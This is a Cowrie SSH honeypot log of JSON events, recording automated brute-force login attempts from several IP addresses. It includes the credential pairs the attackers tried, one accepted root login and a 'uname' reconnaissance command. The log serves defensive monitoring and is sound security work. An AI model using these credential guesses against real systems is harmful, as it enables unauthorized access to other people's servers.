{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:42:42.478121Z","src_ip":"45.125.211.194","session":"0fc5d6e53dc7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:43.305048Z","src_ip":"45.125.211.194","session":"0fc5d6e53dc7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:44.514894Z","src_ip":"45.125.211.194","session":"0fc5d6e53dc7"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":29584,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1fc6883f41","protocol":"ssh","message":"New connection: 80.94.95.15:29584 (1.2.3.4:22) [session: ae1fc6883f41]","sensor":"my-vps","timestamp":"2025-08-28T03:42:54.146935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:42:54.147930Z","src_ip":"80.94.95.15","session":"ae1fc6883f41"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:42:54.199449Z","src_ip":"80.94.95.15","session":"ae1fc6883f41"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:54.493047Z","src_ip":"80.94.95.15","session":"ae1fc6883f41"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:55.546699Z","src_ip":"80.94.95.15","session":"ae1fc6883f41"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":25708,"dst_ip":"1.2.3.4","dst_port":22,"session":"a21b3735eeb4","protocol":"ssh","message":"New connection: 45.125.211.194:25708 (1.2.3.4:22) [session: a21b3735eeb4]","sensor":"my-vps","timestamp":"2025-08-28T03:42:57.005370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:42:57.056733Z","src_ip":"45.125.211.194","session":"a21b3735eeb4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:42:57.219261Z","src_ip":"45.125.211.194","session":"a21b3735eeb4"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:42:58.056212Z","src_ip":"45.125.211.194","session":"a21b3735eeb4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:42:59.267835Z","src_ip":"45.125.211.194","session":"a21b3735eeb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65040,"dst_ip":"1.2.3.4","dst_port":22,"session":"25ad46c5abf9","protocol":"ssh","message":"New connection: 212.227.125.160:65040 (1.2.3.4:22) [session: 25ad46c5abf9]","sensor":"my-vps","timestamp":"2025-08-28T03:43:00.791376Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-28T03:43:00.792297Z","src_ip":"212.227.125.160","session":"25ad46c5abf9"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:00.793161Z","src_ip":"212.227.125.160","session":"25ad46c5abf9"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22660,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbfcfc433e3b","protocol":"ssh","message":"New connection: 45.125.211.194:22660 (1.2.3.4:22) [session: dbfcfc433e3b]","sensor":"my-vps","timestamp":"2025-08-28T03:43:11.957939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:43:12.015588Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:43:12.190399Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:43:13.065654Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:43:13.653236Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:43:13.653938Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:13.875278Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:13.876341Z","src_ip":"45.125.211.194","session":"dbfcfc433e3b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51772,"dst_ip":"1.2.3.4","dst_port":22,"session":"a105a3c95dca","protocol":"ssh","message":"New connection: 45.125.211.194:51772 (1.2.3.4:22) [session: a105a3c95dca]","sensor":"my-vps","timestamp":"2025-08-28T03:43:26.740851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:43:26.762434Z","src_ip":"45.125.211.194","session":"a105a3c95dca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:43:26.959142Z","src_ip":"45.125.211.194","session":"a105a3c95dca"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:27.792494Z","src_ip":"45.125.211.194","session":"a105a3c95dca"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:29.004500Z","src_ip":"45.125.211.194","session":"a105a3c95dca"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":12537,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec5515e7750","protocol":"ssh","message":"New connection: 45.125.211.194:12537 (1.2.3.4:22) [session: 1ec5515e7750]","sensor":"my-vps","timestamp":"2025-08-28T03:43:41.418724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:43:41.463321Z","src_ip":"45.125.211.194","session":"1ec5515e7750"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:43:41.632006Z","src_ip":"45.125.211.194","session":"1ec5515e7750"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:42.464288Z","src_ip":"45.125.211.194","session":"1ec5515e7750"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:43.675625Z","src_ip":"45.125.211.194","session":"1ec5515e7750"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e95b1941ca61","protocol":"ssh","message":"New connection: 194.233.79.134:34088 (1.2.3.4:22) [session: e95b1941ca61]","sensor":"my-vps","timestamp":"2025-08-28T03:43:44.696460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:43:44.960797Z","src_ip":"194.233.79.134","session":"e95b1941ca61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:43:44.961438Z","src_ip":"194.233.79.134","session":"e95b1941ca61"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:47.537072Z","src_ip":"194.233.79.134","session":"e95b1941ca61"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:49.016266Z","src_ip":"194.233.79.134","session":"e95b1941ca61"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":48902,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab62f70c5fea","protocol":"ssh","message":"New connection: 80.94.95.15:48902 (1.2.3.4:22) [session: ab62f70c5fea]","sensor":"my-vps","timestamp":"2025-08-28T03:43:50.870652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:43:50.871758Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:43:50.923236Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:51.250256Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin2","message":"login attempt [admin/admin2] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:52.303930Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r5t","message":"login attempt [admin/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:53.357128Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"QgZDQCK0WUiUYiu","message":"login attempt [admin/QgZDQCK0WUiUYiu] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:54.411846Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"guest","message":"login attempt [admin/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:55.465717Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36779,"dst_ip":"1.2.3.4","dst_port":22,"session":"365140e88f01","protocol":"ssh","message":"New connection: 45.125.211.194:36779 (1.2.3.4:22) [session: 365140e88f01]","sensor":"my-vps","timestamp":"2025-08-28T03:43:56.086056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:43:56.092850Z","src_ip":"45.125.211.194","session":"365140e88f01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:43:56.294521Z","src_ip":"45.125.211.194","session":"365140e88f01"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:56.518704Z","src_ip":"80.94.95.15","session":"ab62f70c5fea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T03:43:57.126177Z","src_ip":"45.125.211.194","session":"365140e88f01"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:43:58.336559Z","src_ip":"45.125.211.194","session":"365140e88f01"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":65256,"dst_ip":"1.2.3.4","dst_port":22,"session":"5925dfc22939","protocol":"ssh","message":"New connection: 45.125.211.194:65256 (1.2.3.4:22) [session: 5925dfc22939]","sensor":"my-vps","timestamp":"2025-08-28T03:44:10.905547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:44:10.951431Z","src_ip":"45.125.211.194","session":"5925dfc22939"}
